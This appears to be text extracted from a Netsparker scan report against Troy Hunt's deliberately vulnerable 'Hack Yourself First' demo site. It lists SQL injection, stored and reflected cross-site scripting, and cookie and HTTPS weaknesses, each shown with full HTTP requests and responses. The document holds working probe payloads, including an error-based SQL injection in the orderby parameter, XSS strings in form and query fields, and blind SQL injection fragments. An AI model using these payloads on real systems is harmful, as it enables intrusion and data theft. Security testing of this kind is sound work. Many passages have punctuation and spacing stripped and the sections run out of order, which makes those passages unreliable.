User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true
Response
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/,Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/,Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2></body></html>
1 TOTAL | IMPORTANT
7. Out-of-date Version (Microsoft SQL Server)
Netsparker identified you are using an out-of-date version of Microsoft SQL.
Impact
Since this is an old version of the software, it may be vulnerable to attacks.
Remedy
Please upgrade your installation of Microsoft SQL Server to the latest stable version.
Classification
OWASP 2010-A6, OWASP 2013-A9, PCI V2.0-6.1, PCI V3.0-6.1, CAPEC-310
7.1 /Make/1
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Identified Version
11.0.9222.17
Latest Version
12.0.2000.0
Vulnerability Database
Result is based on 18/08/2014 vulnerability database content.
Certainty
Request
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<meta name="viewport" content="width=device-width" />
<style>
 body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
 p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
 b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
 H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
 H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
 pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt}
 .marker {font-weight: bold; color: black;text-decoration: none;}
 .version {color: gray;}
 .error {margin-bottom: 10px;}
 .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
 @media screen and (max-width: 639px) {
  pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; }
 }
 @media screen and (max-width: 479px) {
  pre { width: 280px; }
 }
</style>
</head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
1 TOTAL | MEDIUM | 1 CONFIRMED
8. Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.
Impact
If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the action of the form in the HTML to steal the user's password. Even though the target page is HTTPS, this does not protect the system against man-in-the-middle attacks.
This issue is important as it negates the use of SSL as a privacy protection barrier.
Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
8.1 /Account/Login CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Login
Form target action
https://hackyourselffirst.troyhunt.com/Account/Login
Request
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Log in - Supercar Showdown</title>
<link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<meta name="viewport" content="width=device-width" />
<link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head>
<body>
<header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><…
3 TOTAL | MEDIUM
9. [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking user's active session.
- Changing the look of the page within the victim's browser.
- Mounting a successful phishing attack.
- Intercepting data and performing man-in-the-middle attacks.
Remedy
This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.
There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-cross-site scripting libraries.
Remedy References
[ASP.NET] - Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
External References
XSS Cheat Sheet
OWASP - cross-site scripting
XSS Shell
XSS Tunnelling
Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
9.1 /api/vote
http://hackyourselffirst.troyhunt.com/api/vote
Parameters
Parameter | Type | Value
userId | POST | 1
supercarId | POST | 3
comments | POST | '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>
Notes
Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Certainty
Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments='"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Response
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.\r\nIncorrect syntax near '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n   at Web.Controllers.VoteController.Post(Vote vote)\r\n   at lambda_method(Closure , Object , Object[] )\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…
9.2 /api/admin
http://hackyourselffirst.troyhunt.com/api/admin?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt
Parameters
Parameter | Type | Value
nsextt | GET | '"--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>
Notes
Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Certainty
Request
GET /api/admin?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
3.1 /Search CONFIRMED
http://hackyourselffirst.troyhunt.com/Search?searchTerm='%2Bnetsparker(9)%2B'
Parameters
Parameter | Type | Value
searchTerm | GET | '+netsparker(9)+'
Request
GET /Search?searchTerm='%2Bnetsparker(9)%2B' HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
…</section></div></div></div></div></header>
<div class="container"><section>
<h2>You searched for &quot;<span id="searchTerm">'+netsparker(9)+'</span>&quot;</h2>
<p class="alert alert-error">No results found for your search.</p>
</section><hr><footer><p>&copy; 2014 - Hack Yourself First</p></footer>
…></script>
<script>$("#results tr").click(function () { var url = "/Supercar/" + $(this).attr("id"); window.location.href = url; });
$("#searchTerm").val(''+netsparker(9)+'');</script>
<script>(function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r…
1 TOTAL | IMPORTANT | 1 CONFIRMED
4. Permanent Cross-site Scripting
Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of injected JavaScript.
Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/JavaScript/VBScript within the browser.
Permanent means that the attack will be stored in the backend system. In normal XSS attacks an attacker needs to e-mail the victim, but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might attack an administrator to gain full control over the application.
Impact
Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
- Users' session-sensitive information, such as cookies, can be stolen.
- XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
- The website can be redirected to a new location, defaced or used as a phishing site.
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
IMPORTANT: 1 total, 1 confirmed

6. Cookie Not Marked as Secure
Netsparker identified a cookie that is set over HTTPS but is not marked as Secure.
This means the cookie can be stolen by an attacker who can observe the victim's plain-HTTP traffic or who carries out a man-in-the-middle attack. No decryption of the HTTPS traffic is needed: because the Secure attribute is missing, the browser will also send the cookie on unencrypted requests to the same host.

Impact
This cookie will be transmitted over an HTTP connection; therefore, if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request in order to steal the cookie. In this instance no such trick is required: the login response below redirects to http://hackyourselffirst.troyhunt.com/, so the freshly issued AuthCookie is sent in cleartext on the very next request the browser makes.

Actions to Take
1. See the remedy for solution.
2. Mark all cookies used within the application as Secure. (If the cookie is not related to authentication and does not carry any personal information, you do not have to mark it as Secure.)

Remedy
Mark all cookies used within the application as Secure. In ASP.NET this is the Secure property of HttpCookie; setting requireSSL="true" on the <httpCookies> element in web.config applies it to every cookie the application issues, including the forms-authentication cookie.

Required Skills for Successful Exploitation
To exploit this issue the attacker needs to be able to intercept traffic. This generally requires access to the victim's network path: attackers need to understand layer 2, have physical access to systems that act as waypoints for the traffic, or have gained access to a system between the victim and the web server. In practice a shared wireless network is sufficient.

External References
.NET Cookie.Secure Property
How to Create Totally Secure Cookies

Classification
OWASP 2010-A9, OWASP 2013-A6, PCI v2.0-6.5.4, PCI v3.0-6.5.4, CWE-614, CAPEC-102, WASC-15

6.1 /Account/Login CONFIRMED
https://hackyourselffirst.troyhunt.com/Account/Login
Identified Cookie: AuthCookie
Request
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true
Response
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
